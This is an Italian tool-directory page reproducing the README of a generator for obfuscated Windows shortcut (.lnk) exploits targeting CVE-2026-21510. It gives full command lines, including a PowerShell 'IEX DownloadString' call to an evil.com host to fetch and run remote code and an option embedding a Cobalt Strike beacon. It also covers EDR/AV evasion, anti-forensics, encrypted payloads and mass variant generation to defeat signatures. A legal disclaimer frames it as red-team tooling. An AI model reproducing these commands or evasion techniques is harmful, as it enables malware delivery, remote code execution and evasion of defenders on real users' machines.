Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/epsilonpointori/epsilonpointlnk
ExploitSfruttamento di Applicazioni WebAnalisi MalwarePenetration TestingRed TeamingSviluppo PayloadAnti-Bot
GitHubepsilonpointori/epsilonpointlnk

EpSiLoNPoInTlnk

Genera file .lnk offuscati che sfruttano CVE-2026-21510 con LNK stomping, payload crittografati e anti-forense per test di penetrazione autorizzati e operazioni di red team.

Vedi Repository
23 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

README EpSiLoNPoInTlnk CVE-2026-21510 - Generatore di .LNK Strumento per la generazione di file .lnk che sfruttano la vulnerabilità CVE-2026-21510 (Windows ShellLink Remote Code Execution). Progettato per la ricerca offensiva in sicurezza, test di penetrazione autorizzati e analisi delle vulnerabilità.

Avviso Legale ⚠️ QUESTO STRUMENTO È DESTINATO ESCLUSIVAMENTE A UN USO LEGALE E AUTORIZZATO. Qualsiasi utilizzo non autorizzato contro sistemi o reti violerebbe le leggi locali e internazionali (es: Computer Fraud and Abuse Act (CFAA), GDPR, Legge Godfrain in Francia). L'autore declina ogni responsabilità in caso di uso improprio. (Vedi la Clausola di Non Responsabilità di seguito.)

Descrizione Questo generatore crea file .lnk offuscati per sfruttare CVE-2026-21510, una vulnerabilità nell'elaborazione dei collegamenti di Windows. Integra:

LNK Stomping (5 varianti: dot, path_segment, relative, double_extension, unicode)

PropertyStore con CLSID casuali e PKEY

KnownFolderDataBlock (KnownFolderID casuali o mirati)

EnvironmentVariableDataBlock (offuscamento Unicode, variabili dinamiche)

Offuscamento (Livelli 1-5: TrackerDataBlock, ConsoleDataBlock, blocchi casuali)

Payload incorporati e cifrati (AES-256-CBC + XOR)

Anti-Forensics (timestamp a 0, dimensione file a 0, metadati minimi)

Bypass EDR/AV (processi legittimi, argomenti offuscati in PowerShell)

Generazione di varianti casuali (10+ varianti uniche per evitare le firme)

Prerequisiti Sistema OS: Windows (per testare i .lnk generati) o Linux/macOS (per la generazione).

Python: ≥ 3.10. Dipendenze: pip install pycryptodome

Strumenti Consigliati Analisi: PEStudio, Detect It Easy (DIE)

Debug: x64dbg, WinDbg

Test: Macchina virtuale Windows (es: Windows 10/11 su VirtualBox) isolata.

Installazione Clonare il repository: git clone https://github.com/EpSiLoNPoInT/EpSiLoNPoInTlnk.git cd EpSiLoNPoInTlnk Installare le dipendenze: pip install -r requirements.txt (Facoltativo) Creare un ambiente virtuale: python -m venv venv source venv/bin/activate # Linux/macOS venv\Scripts\activate # Windows

Utilizzo

  1. Generazione Base python lnkstomperpoint.py --target "C:\Windows\System32\cmd.exe" --args "/c calc.exe" --output exploit.lnk Genera un .lnk che sfrutta CVE-2026-21510 per avviare calc.exe.

  • Opzioni Avanzate Opzione Descrizione Valore predefinito --target Percorso di destinazione (es: C:\Windows\System32\cmd.exe) C:\Windows\System32\cmd.exe --args Argomenti per la destinazione (es: /c whoami) /c calc.exe --output Percorso di output del .lnk ./EpSiLoNPoInTlnk_[TIMESTAMP].lnk --working-dir Directory di lavoro C:\Windows\System32 --description Descrizione del collegamento Stringa casuale --unc Usa un percorso UNC (?\C:...) False --lnk-stomping Abilita il LNK Stomping True --stomping-variant Variante di LNK Stomping (dot, path_segment, relative, double_extension, unicode, random) random --obfuscation Aggiunge blocchi ExtraData inutili True --obfuscation-level Livello di offuscamento (1-5) 5 --embed-payload Percorso di un file da incorporare (es: payload.bin) None --encrypt-payload Cifra il payload (AES-256-CBC + XOR) True --anti-forensics Applica tecniche anti-forensics True --randomize-clsid Randomizza il CLSID nel PropertyStore True --randomize-known-folder Randomizza il KnownFolderID True --obfuscate-arguments Offusca gli argomenti (PowerShell) True --generate-variants Genera N varianti casuali 0 --debug Modalità debug avanzata (log dettagliati) False

  • Esempi Esempio 1: Exploit con Payload Incorporato python lnkstomperpoint.py
    --target "C:\Windows\System32\cmd.exe"
    --args "/c payload.exe"
    --embed-payload ./malware.bin
    --output exploit_with_payload.lnk
    --obfuscation-level 5
    --anti-forensics Genera un .lnk con un payload cifrato (AES-256 + XOR) e offuscato.

  • Esempio 2: Generazione di 10 Varianti Casuali python lnkstomperpoint.py
    --target "C:\Windows\System32\powershell.exe"
    --args "-nop -ep bypass -c IEX (New-Object Net.WebClient).DownloadString('http://evil.com/shellcode.ps1')"
    --generate-variants 10
    --output-dir ./variants Crea 10 varianti uniche per evitare le firme EDR/AV.

    Esempio 3: Modalità Minimalista (per test) python lnkstomperpoint.py
    --target "C:\Windows\System32\notepad.exe"
    --obfuscation False
    --anti-forensics False
    --output minimal_exploit.lnk Genera un .lnk non offuscato (per analisi o debug).

    Funzionamento Tecnico

    1. Struttura del .LNK Il file .lnk generato segue la specifica MS-SHLLINK con le seguenti estensioni:

    Intestazione ShellLink (0x4C byte fissi + offset): LinkCLSID: 00021401-0000-0000-C000-000000000046 (obbligatorio). LinkFlags: Configurato per attivare HasRelativePath, HasWorkingDir, IsUnicode, ecc.

    StringData: RelativePath: Percorso di destinazione (con LNK Stomping se attivato). WorkingDir: Directory di lavoro (es: C:\Windows\System32). Arguments: Argomenti offuscati (PowerShell, cmd, ecc.).

    ExtraData Blocks (ordine critico): PropertyStoreDataBlock: Contiene PKEY_AppUserModel_ID (CLSID casuale). KnownFolderDataBlock: Punta a una cartella di sistema (es: %SystemRoot%). EnvironmentVariableDataBlock: Forza l'espansione delle variabili prima del Mark-of-the-Web (MotW). Blocchi di Offuscamento (in base a obfuscation_level): TrackerDataBlock (Livello 1) ConsoleDataBlock (Livello 2) DarwinDataBlock, ShimDataBlock, ecc. (Livelli 3-5)

    Payload Incorporato (se --embed-payload): Cifrato con AES-256-CBC + XOR.

    1. Tecniche di Bypass Tecnica Descrizione Impatto LNK Stomping Aggiunge caratteri invisibili (., , \u202e) al percorso di destinazione. Bypassa le rilevazioni basate sulle firme dei percorsi. PropertyStore Usa PKEY con CLSID casuali per evitare le firme. Evita le regole YARA/EDR che mirano a CLSID noti. KnownFolder Punta a cartelle di sistema (%SystemRoot%, %Temp%). Bypassa le restrizioni sui percorsi assoluti. EnvironmentVariable Offusca il percorso con variabili (%TEMP%, %APPDATA%). Evita le rilevazioni statiche. Offuscamento Livello 5 Aggiunge blocchi ExtraData casuali e padding. Rende difficile l'analisi statica. Anti-Forensics Imposta a 0 timestamp, dimensione del file, ecc. Complica l'analisi forense. Argomenti Offuscati Usa tecniche PowerShell (Base64, XOR, Reverse). Bypassa le rilevazioni di comandi dannosi.
    2. Cifratura del Payload Se --embed-payload è attivato:

    Il payload viene cifrato con AES-256-CBC (chiave casuale da 32 byte, IV da 16 byte).

    Viene applicato un livello XOR con i primi 16 byte della chiave AES.

    La chiave e l'IV sono memorizzati in un ShimDataBlock per la decifratura successiva.

    Test e Validazione

    1. Validazione Automatica Il generatore include una funzione _validate() che verifica:

    La dimensione minima del file.

    La validità di HeaderSize e CLSID.

    La presenza dei LinkFlags richiesti.

    La struttura dei blocchi ExtraData (PropertyStore, KnownFolder, ecc.).

    1. Test Manuali Analisi Statica: Usare PEStudio per verificare la struttura del .lnk. Verificare che i blocchi ExtraData siano presenti.

    Esecuzione (in un ambiente isolato): Fare doppio clic sul .lnk e osservare il comportamento. Usare Process Monitor (ProcMon) per analizzare le chiamate di sistema.

    Rilevamento EDR/AV: Testare con strumenti come Windows Defender o CrowdStrike. Se il .lnk viene rilevato, aumentare obfuscation_level o disattivare alcune opzioni.

    Casi d'Uso Scenario Comando Descrizione Test di Penetrazione --target "C:\Windows\System32\cmd.exe" --args "/c whoami" Verifica se l'exploit funziona su una macchina target. Red Team --embed-payload ./cobaltstrike_beacon.bin --obfuscation-level 5 Genera un .lnk con un payload Cobalt Strike offuscato. Ricerca --generate-variants 50 --output-dir ./samples Crea 50 varianti per testare le rilevazioni EDR. Debug --debug --obfuscation False Mostra log dettagliati per analizzare la struttura del .lnk. Contributi I contributi sono benvenuti! Ecco come contribuire:

    Fork del progetto.

    Crea un branch (git checkout -b feature/nuova-funzionalità).

    Commit delle modifiche (git commit -m "Aggiunta della funzionalità X").

    Push verso il branch (git push origin feature/nuova-funzionalità).

    Apri una Pull Request. Idee per Contributi:

    Aggiungere nuove varianti di LNK Stomping.

    Implementare altri algoritmi di cifratura (es: ChaCha20).

    Migliorare l'offuscamento degli argomenti (es: uso di JScript).

    Aggiungere test unitari per validare le strutture .lnk.

    Licenza Questo progetto è sotto licenza MIT. Vedi il file LICENSE per maggiori dettagli.

    Clausola di Non Responsabilità 🚨 Clausola di Non Responsabilità

    📜 CLAUSOLA DI NON RESPONSABILITÀ (DISCLAIMER)

    Leggere attentamente prima di qualsiasi utilizzo di questo strumento.

    ⚠️ AVVISO GIURIDICO ESPLICITO

    L'utente di questo strumento (di seguito denominato "l'Utente") riconosce e accetta espressamente i seguenti termini:

    Uso Esclusivamente Legale

    Questo strumento è destinato esclusivamente a un uso legale e autorizzato, come:

    La ricerca in sicurezza informatica in un contesto accademico o professionale.

    I test di penetrazione (pentest) su sistemi di cui l'Utente ha l'autorizzazione scritta del proprietario.

    L'analisi delle vulnerabilità in ambienti controllati (es: laboratori di sicurezza, CTF, bug bounty autorizzati).

    Qualsiasi altro uso è severamente vietato e può costituire un reato penale in molte giurisdizioni, inclusi (ma non limitati a):

    Francia: Legge n. 88-19 del 5 gennaio 1988 (Legge Godfrain), articoli 323-1 a 323-7 del Codice Penale (accesso fraudolento, modifica di dati, ecc.).

    Unione Europea: Direttiva 2013/40/UE sugli attacchi contro i sistemi informativi.

    Stati Uniti: Computer Fraud and Abuse Act (CFAA), 18 U.S. Code § 1030.

    Altri paesi: Leggi locali equivalenti (es: Computer Misuse Act nel Regno Unito).

    Assenza di Garanzia

    L'Autore (EpSiLoNPoInT) non fornisce alcuna garanzia, esplicita o implicita, riguardo a:

    L'affidabilità, l'accuratezza o l'utilità di questo strumento.

    L'assenza di bug o vulnerabilità nel codice.

    La compatibilità con tutti i sistemi o ambienti.

    I risultati ottenuti durante l'utilizzo dello strumento.

    L'Utente si assume tutti i rischi legati all'utilizzo di questo strumento, inclusi (ma non limitati a):

    I danni materiali o software causati al proprio sistema o a sistemi di terze parti.

    Le conseguenze legali in caso di violazione delle leggi applicabili.

    Le perdite di dati o le interruzioni di servizio.

    Limitazione di Responsabilità

    In nessun caso l'Autore, i contributori o qualsiasi altra parte coinvolta nella creazione, produzione o distribuzione di questo strumento potrà essere ritenuta responsabile per:

    Qualsiasi danno (diretto, indiretto, incidentale, speciale, esemplare o consequenziale), inclusi (ma non limitati a):

    Le perdite di profitti.

    Le perdite di dati o la corruzione di file.

    I danni alla reputazione.

    Le azioni legali o le multe sostenute dall'Utente.

    Anche se l'Autore è stato informato della possibilità di tali danni.

    Rispetto delle Leggi e dei Regolamenti

    L'Utente si impegna a conformarsi a tutte le leggi, i regolamenti e gli standard applicabili nella propria giurisdizione, inclusi (ma non limitati a):

    Le leggi sulla protezione dei dati (es: GDPR nell'UE).

    Le leggi sulla cybersecurity e la frode informatica.

    Le politiche di sicurezza del proprio datore di lavoro o della propria organizzazione.

    L'Utente indennizzerà e terrà indenne l'Autore da qualsiasi reclamo, danno o spesa (inclusi i costi legali) derivante da una violazione di queste leggi o impegni.

    Divieto di Ridistribuzione Dannosa

    All'Utente è formalmente vietato:

    Vendere, noleggiare o ridistribuire questo strumento a fini dannosi.

    Modificare il codice per trasformarlo in un'arma informatica criminale (es: ransomware, spyware).

    Utilizzare questo strumento per prendere di mira infrastrutture critiche (es: ospedali, governi, banche) senza autorizzazione esplicita.

    Condividere questo strumento con terzi senza comunicare loro questa clausola di non responsabilità.

    Esclusione di Responsabilità per Terze Parti

    Questo strumento può interagire con librerie di terze parti (es: pycryptodome).

    L'Autore non controlla e non è responsabile delle azioni o delle vulnerabilità di queste librerie.

    L'Utente deve verificare la licenza e la sicurezza di qualsiasi dipendenza utilizzata.

    Uso a Proprio Rischio

    Utilizzando questo strumento, accetti pienamente e senza riserve i termini di questa clausola.

    Se non sei d'accordo con questi termini, non utilizzare questo strumento e cancella immediatamente tutte le copie in tuo possesso.

    Giurisdizione e Legge Applicabile

    Questa clausola è regolata e interpretata in conformità con le leggi della Repubblica Francese.

    Qualsiasi controversia derivante da o relativa a questa clausola o all'utilizzo di questo strumento sarà sottoposta alla competenza esclusiva dei tribunali di Parigi (Francia).

    🔐 Raccomandazioni di Sicurezza

    Per un uso sicuro e legale di questo strumento: ✅ Isola sempre i test in un ambiente virtuale (es: VirtualBox, VMware). ✅ Ottieni un'autorizzazione scritta prima di testare su sistemi che non ti appartengono. ✅ Disattiva le connessioni di rete delle macchine di test per evitare perdite accidentali. ✅ Usa strumenti di monitoraggio (es: Wireshark, Process Monitor) per analizzare il comportamento. ✅ Segnala le vulnerabilità in modo responsabile (es: tramite programmi di bug bounty). ❌ Non testare mai su sistemi di produzione senza autorizzazione. ❌ Non condividere gli exploit generati con persone non autorizzate. ❌ Non archiviare payload dannosi su sistemi accessibili al pubblico.

    📞 Contatto

    Per qualsiasi domanda legale o tecnica riguardante questo strumento:

    Autore: EpSiLoNPoInT

    Email: [email protected]

    GitHub: EpSiLoNPoInTOrI

    ⚠️ Nota: L'Autore non fornirà alcun supporto per usi illegali o non etici di questo strumento.

    📅 Data della Clausola

    Ultimo aggiornamento: 9 maggio 2026 Versione: 1.0

    Scarica lo strumento